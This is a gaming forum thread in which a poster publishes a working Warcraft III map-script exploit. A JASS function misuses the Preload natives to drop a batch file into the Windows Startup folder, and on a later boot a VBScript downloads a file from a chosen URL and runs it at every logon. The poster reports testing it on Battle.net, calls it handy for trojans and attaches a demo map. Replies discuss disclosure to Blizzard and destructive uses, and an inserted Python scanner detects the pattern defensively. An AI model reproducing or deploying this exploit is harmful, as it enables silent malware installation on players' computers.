How to virus in Warcraft III

Jesus4Lyf

Good Idea™
Reaction score
397
Made a post about it here, but hey...
JASS:
function Infest takes string url, string localname returns nothing
    call PreloadGenClear()
    call PreloadGenStart()
    call Preload("\")\necho Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") > %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objXMLHTTP.open \"GET\", \""+url+"\", false >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objXMLHTTP.send() >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho If objXMLHTTP.Status = 200 Then >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho Set objADOStream = CreateObject(\"ADODB.Stream\") >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Open >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Type = 1 >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Write objXMLHTTP.ResponseBody >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Position = 0 >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho Set objFSO = Createobject(\"Scripting.FileSystemObject\") >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho If objFSO.Fileexists(\"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\") Then objFSO.DeleteFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.SaveToFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Close >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho End if >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objFSO.DeleteFile \"%TEMP%\\download.vbs\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objFSO.DeleteFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\myvirus.bat\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\nstart %TEMP%\\download.vbs\n//")
    call PreloadGenEnd("C:\\Users\\YOURUSERNAMEHERE\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\myvirus.bat")
    call PreloadGenClear()
    call PreloadGenStart()
    call Preload("\")\necho Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") > %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objXMLHTTP.open \"GET\", \""+url+"\", false >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objXMLHTTP.send() >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho If objXMLHTTP.Status = 200 Then >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho Set objADOStream = CreateObject(\"ADODB.Stream\") >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Open >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Type = 1 >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Write objXMLHTTP.ResponseBody >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Position = 0 >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho Set objFSO = Createobject(\"Scripting.FileSystemObject\") >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho If objFSO.Fileexists(\"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"+localname+"\") Then objFSO.DeleteFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.SaveToFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Close >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho End if >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objFSO.DeleteFile \"%TEMP%\\download.vbs\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objFSO.DeleteFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\myvirus.bat\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\nstart %TEMP%\\download.vbs\n//")
    call PreloadGenEnd("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\myvirus.bat")
endfunction

//===========================================================================
function InitTrig_Melee_Initialization takes nothing returns nothing
    call Infest("http://www.stephan-brenner.com/blog/wp-content/uploads/2008/08/donothing.zip", "myvirus.zip")
endfunction

This function is cool. For Windows 7, you must replace YOURUSERNAMEHERE with the username on the computer, but on XP this should be unnecessary (and so XP is particularly vulnerable). Just call the function from WC3. When you next restart your computer, the url you specify will be downloaded to your startup folder as the name you specify, and called (the reason you specify the local filename is so Windows knows what file type to run it as).

If someone could test this online with a friend who has Windows XP and finds it to work, we can successfully say Blizzard needs to patch again. I mean, I'm sure the Russians will love it. :)

In case someone doesn't understand what this does, calling the function from any map will run the file specified on every player's pc on every boot from then onwards. Very handy for trojans and the like. :thup:

Let me know if this works on XP! I can't test it right now... :p

Edit: To remove infections, go to Start > Programs > Startup and delete the filename you used as "localname", or "myvirus.bat", depending which is visible.
Edit: Tested on Windows XP, works online, serious threat.
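Added example, not part of the original post or thread: a Python check that a map host or reviewer can run over a map script to flag the pattern visible in the script above, namely `Preload` strings that carry escaped quotes or newlines and `PreloadGenEnd` targets that are absolute, point at a Startup folder, or end in a script extension. The function names and the sample script are constructed for illustration.

```python
import re
# Extensions Windows runs or interprets when a file is opened at logon.
RISKY_EXT = (".bat", ".cmd", ".vbs", ".js", ".exe", ".com", ".scr", ".lnk")
CALL_RE = re.compile(r"\bcall\s+(Preload|PreloadGenEnd)\s*\((.*)\)")

def decode_literals(arg):
    """Join the decoded contents of every JASS string literal in arg."""
    out, i, in_str = [], 0, False
    while i < len(arg):
        c = arg[i]
        if in_str and c == "\\" and i + 1 < len(arg):
            # \n becomes a newline; \\ and \" become the bare character.
            out.append("\n" if arg[i + 1] == "n" else arg[i + 1])
            i += 2
            continue
        if c == '"':
            in_str = not in_str
        elif in_str:
            out.append(c)
        i += 1
    return "".join(out)

def scan_jass(source):
    """Return (line_no, native, reasons) for suspicious preload calls."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        m = CALL_RE.search(line)
        if not m:
            continue
        native, text = m.group(1), decode_literals(m.group(2))
        reasons = []
        if native == "Preload" and any(ch in text for ch in '"\n'):
            reasons.append("quote or newline inside a preload path")
        if native == "PreloadGenEnd":
            low = text.lower()
            if re.match(r"[a-z]:\\|\\\\", low):
                reasons.append("absolute output path")
            if "startup" in low:
                reasons.append("writes into a Startup folder")
            if low.endswith(RISKY_EXT):
                reasons.append("executable or script extension")
        if reasons:
            findings.append((no, native, "; ".join(reasons)))
    return findings
# Constructed sample script (not from a real map): lines 2 and 4 should be flagged.
SAMPLE = r'''call Preload("units\\nightelf\\Archer\\Archer.mdl")
call Preload("\")\necho CONSTRUCTED-MARKER\n//")
call PreloadGenEnd("save\\mymap\\preloads.pld")
call PreloadGenEnd("C:\\Users\\example\\Start Menu\\Programs\\Startup\\x.bat")
'''
```

The script text is assumed to have been extracted from the `.w3x` archive beforehand; `scan_jass(SAMPLE)` returns one finding for the injected `Preload` string and one for the Startup-folder target.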
 

Jesus4Lyf

Good Idea™
Reaction score
397
>So this is what you were up to all these months
Something like that.
Actually, I've just not been around, but when this came up, I figured I'd drop you guys a note. ;)

Tested on Windows XP. Works 100%.

I should clarify - it's the second boot after you play the map, not the first. Here is a demo map. :)

Do not play any WC3 maps until the next patch.

This map will put an image of the word CYPHIX in your startup. Nothing dangerous. :)
To remove, go to Start > Programs > Startup and delete cyphix.jpg.
Works on map initialisation, works on battle.net.
AKA. This is a real tried and proven threat. :thup:
 

Attachments

  • virustest.w3x
    13.7 KB · Views: 654

Accname

2D-Graphics enthusiast
Reaction score
1,462
omg you really are making the world a little worse every now and then. what comes next? you tell us not to breathe because viruses could be in the air?

lol, maybe you should tell blizzard they should hire you for bugfixing and such.

by the way, i would delete the scripts, the wrong people could read this thread. i think the majority of the community will trust in your words, those who don't will most probably still play wc3 maps anyways.
 

Jesus4Lyf

Good Idea™
Reaction score
397
>omg you really are making the world a little worse every now and then.
Well, if I don't find and post it, someone else will find it and abuse it. It's a matter of time.

>already reported it to blizzard?
Can't be stuffed, I have assignments to do. -_-
Edit: Done. And I asked if they have QA jobs available. :p

>maybe you should tell blizzard they should hire you for bugfixing and such
They should, considering this is.. the third time..?

>by the way, i would delete the scripts
I'll wait to see what the other moderators think. I love exposing it.. :)
 

kingkingyyk3

Visitor (Welcome to the Jungle, Baby!)
Reaction score
216
Hmm, what happens if I link it to a super large file (takes ages to download)? Lol.
 

Romek

Super Moderator
Reaction score
963
Wow, another exploit? Blizzard's not going to be impressed. :p

> Hmm, what happens if I link it to a super large file (takes ages to download)? Lol.
It'd download. Eventually. As expected.
 

Jesus4Lyf

Good Idea™
Reaction score
397
The download is done in the background. So the user won't see it... but yes, you can do it.
>Wow, another exploit? Blizzard's not going to be impressed. :p
I wasn't very impressed, either. Surely someone considered that allowing file I/O from WC3 was a bad idea... o.o
 

DioD

New Member
Reaction score
57
Blizzard should give us a legal way to execute code and store data on the HDD (and also sync this data online) and it will be fine.

All known bugs (including the return bug) were developed for good, not for viruses.

well, this can do anything (just like codeexec) (russian developments are always evil :( )
 

Jesus4Lyf

Good Idea™
Reaction score
397
Hey, at least with this, you can download an executable to set the local files flag in WC3. So you can download 100mb model packs to people's computers which can then be used in WC3 maps! Whilst you're at it, you can modify WC3 executables to add additional natives like RtC, all without the map player ever knowing! In fact, you can format their whole hard disk! I think you're right, Blizzard needs to give us more power!! MOAR!!.

Sorry for the sarcasm, but WC3 being able to do file I/O is just wrong. If you can use it for good, you can use it for evil. :)

Now, trying to find how to report bugs to Blizzard... that might be too difficult, even for me. :p
 

Medeam

New Member
Reaction score
3
Why do people find all the nice stuff and show it to everybody :p

I was using this after the return bug got deleted out.... :( not again.... must think what's next now.
 

Romek

Super Moderator
Reaction score
963
> I was using this after the return bug got deleted out.... not again.... must think what's next now.
This doesn't typecast variables.
 

~GaLs~

† Ғσſ ŧħə ѕαĸε Φƒ ~Ğ䣚~ †
Reaction score
180
even real-time antivirus fails against this.. xD
 

DioD

New Member
Reaction score
57
this was kept secret for 2 years, now it does not matter.
warcraft is dead anyway.

no one in the english or russian segment of the internet is using this; asians may be using it, but that's unknown to me. (for example, they used runtime texture changing on units long before it was discovered in the english segment)

also, in some cases warcraft may overwrite existing files (fun with ntldr)
 